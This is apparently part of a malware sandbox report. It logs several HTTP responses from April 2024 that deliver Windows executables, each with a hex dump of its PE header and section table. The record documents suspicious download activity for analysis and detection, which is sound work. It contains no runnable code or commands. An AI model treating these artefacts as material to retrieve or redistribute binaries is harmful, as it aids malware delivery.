00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Apr 2024 22:46:10 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 15 Mar 2024 11:59:56 GMTETag: "4a4030-613b1bf118700"Accept-Ranges: bytesContent-Length: 4866096Content-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 22:46:19 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 22:46:24 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 22:46:29 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 22:46:34 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 22:46:47 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 22:46:49 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 